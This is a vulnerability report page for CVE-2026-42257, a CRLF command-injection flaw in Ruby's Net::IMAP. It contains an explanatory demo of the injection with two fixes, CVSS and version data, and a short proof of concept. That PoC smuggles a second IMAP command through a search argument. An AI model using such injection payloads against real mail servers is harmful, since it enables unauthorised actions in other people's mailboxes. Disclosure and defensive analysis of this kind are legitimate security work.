Security Vulnerability Report
CVE-2026-42257 CVSS 9.8 CRITICAL

CVE-2026-42257

Published: 2026-05-09 20:16:28
Last Modified: 2026-05-18 17:59:38

Description

Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, several Net::IMAP commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled input, it may contain CRLF sequences, which terminate the current command line and let an attacker inject arbitrary IMAP commands that the server executes in the authenticated session. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4.
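The mechanism the description refers to, as an added example (editor's code, not from the advisory or the net-imap project): a minimal model of an IMAP client serialising a command, plus a toy server-side reader that splits received bytes into commands the way an IMAP server does, honouring RFC 3501 literals. It shows a raw, user-derived string turning one command into two, and two fixes: rejecting control characters before the value is used, and encoding the value as an IMAP quoted string or literal so the server consumes it as data. The encoder and parser here are simplified stand-ins, not Net::IMAP internals; the tag, command and payload are constructed for illustration.

```ruby
# Added example: simplified IMAP command serialisation and server-side parsing.
# Not Net::IMAP code; all functions below are illustrative stand-ins.
CRLF = "\r\n".freeze

# Vulnerable pattern: the caller's string is placed on the wire verbatim.
def raw_command(tag, name, raw_arg)
  "#{tag} #{name} #{raw_arg}#{CRLF}"
end

# Fix 1: refuse any argument containing CR, LF or another control character.
class UnsafeInput < ArgumentError; end

def reject_ctl!(str)
  if str.match?(/[\x00-\x1f\x7f]/)
    raise UnsafeInput, "control character in IMAP argument: #{str.inspect}"
  end
  str
end

# Fix 2: encode the value as an IMAP string (RFC 3501 section 4.3). Plain text
# becomes a quoted string with backslash and double quote escaped; anything with
# CR/LF, other control bytes or non-ASCII becomes a literal: {n}CRLF followed by
# exactly n bytes, which the server reads by byte count rather than by line.
def encode_astring(str)
  if str.empty?
    '""'
  elsif str.match?(/[\x00-\x1f\x7f]/) || !str.ascii_only?
    "{#{str.bytesize}}#{CRLF}#{str}"
  else
    '"' + str.gsub(/["\\]/) { |c| "\\#{c}" } + '"'
  end
end

def safe_command(tag, name, key, value)
  "#{tag} #{name} #{key} #{encode_astring(value)}#{CRLF}"
end

# Toy server front end: one command per CRLF-terminated line, except that a
# line ending in {n} makes the server read the next n bytes as data that
# belongs to the same command, so embedded CRLF inside a literal is inert.
def server_commands(wire)
  commands = []
  buf = wire.dup
  current = +""
  until buf.empty?
    line, _sep, rest = buf.partition(CRLF)
    current << line
    if (m = line.match(/\{(\d+)\}\z/))
      n = m[1].to_i
      current << CRLF << rest[0, n].to_s
      buf = rest[n..] || ""
    else
      commands << current
      current = +""
      buf = rest
    end
  end
  commands
end

# Constructed attacker input: a plausible value followed by a second, complete
# IMAP command carrying its own tag.
PAYLOAD = "INBOX\r\nA001 LIST \"\" *".freeze

# Number of commands the server sees for the raw and the encoded variant.
def demo
  vulnerable = server_commands(raw_command("RUBY0001", "SEARCH", "SUBJECT #{PAYLOAD}"))
  hardened   = server_commands(safe_command("RUBY0001", "SEARCH", "SUBJECT", PAYLOAD))
  { vulnerable: vulnerable.length, hardened: hardened.length }
end

if $PROGRAM_NAME == __FILE__
  counts = demo
  puts "raw string:    #{counts[:vulnerable]} command(s) reach the server"
  puts "encoded value: #{counts[:hardened]} command(s) reach the server"
  begin
    reject_ctl!(PAYLOAD)
  rescue UnsafeInput => e
    puts "reject_ctl!: #{e.message}"
  end
end
```

For applications using the library, the fix is the upgrade to 0.4.24, 0.5.14 or 0.6.4. As defence in depth (editor's recommendation, not part of the advisory text), do not hand a user-derived, preformatted String to any Net::IMAP command, and reject CR and LF in values destined for any line-oriented protocol, since a single unescaped control character is the whole attack surface here.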

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Note: 9.8 is the Primary CVSS 3.1 score. The Secondary CVSS 4.0 assessment recorded in the raw JSON below rates the same issue 5.8 MEDIUM (CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N), i.e. it assumes the attacker's string must first be accepted by an application that forwards it to the library, with no confidentiality impact on the vulnerable component. Which rating applies in practice depends on whether an application passes untrusted strings to the affected commands.
Weaknesses: CWE-77 (Command Injection), CWE-93 (CRLF Injection)

Configurations (Affected Products)

cpe:2.3:a:ruby-lang:net\:\:imap:*:*:*:*:*:ruby:*:* (versions < 0.4.24) - VULNERABLE
cpe:2.3:a:ruby-lang:net\:\:imap:*:*:*:*:*:ruby:*:* (versions >= 0.5.0, < 0.5.14) - VULNERABLE
cpe:2.3:a:ruby-lang:net\:\:imap:*:*:*:*:*:ruby:*:* (versions >= 0.6.0, < 0.6.4) - VULNERABLE
Ruby Net::IMAP < 0.4.24
Ruby Net::IMAP 0.5.0 to < 0.5.14
Ruby Net::IMAP 0.6.0 to < 0.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
ruby
require 'net/imap'

# Example of vulnerable usage.
# Attacker-controlled input containing CRLF sequences: the text after the
# CRLF is a complete IMAP command with its own tag, so a server that receives
# it unescaped executes it as a separate command in the authenticated session.
payload = "INBOX\r\nA001 LIST \"\" *"

imap = Net::IMAP.new('imap.example.com')
imap.authenticate('PLAIN', 'username', 'password')

begin
  # Vulnerable call: a single preformatted String is passed as the command
  # argument and, in unpatched versions, goes to the server as raw data.
  # Assumption: the advisory does not list the affected commands; search with
  # a String argument is used here because Net::IMAP passes such a String
  # through unescaped, whereas mailbox names (as in select) are quoted or sent
  # as literals, which would neutralise the CRLF.
  imap.search(payload)
  puts "Payload sent successfully"
rescue => e
  puts "Error occurred: #{e.message}"
ensure
  imap.disconnect if imap
end

References

https://github.com/ruby/net-imap/releases/tag/v0.4.24 (Release Notes)
https://github.com/ruby/net-imap/releases/tag/v0.5.14 (Release Notes)
https://github.com/ruby/net-imap/releases/tag/v0.6.4 (Release Notes)
https://github.com/ruby/net-imap/security/advisories/GHSA-hm49-wcqc-g2xg (Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42257", "sourceIdentifier": "[email protected]", "published": "2026-05-09T20:16:28.463", "lastModified": "2026-05-18T17:59:37.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, several Net::IMAP commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled input, it may contain contain CRLF sequences, which an attacker can use to inject arbitrary IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "0.4.24", "matchCriteriaId": "05DB8FF3-7546-470A-BBB4-4DCAEAD83D6F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.5.0", "versionEndExcluding": "0.5.14", "matchCriteriaId": "2CCEB891-1D8F-4431-A79C-2A7560A84F4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.6.0", "versionEndExcluding": "0.6.4", "matchCriteriaId": "9A6D1995-BFA3-490F-967D-252CA7BE2264"}]}]}], "references": [{"url": "https://github.com/ruby/net-imap/releases/tag/v0.4.24", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/releases/tag/v0.5.14", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/releases/tag/v0.6.4", "source": "[email protected]", "tags": 
["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/security/advisories/GHSA-hm49-wcqc-g2xg", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}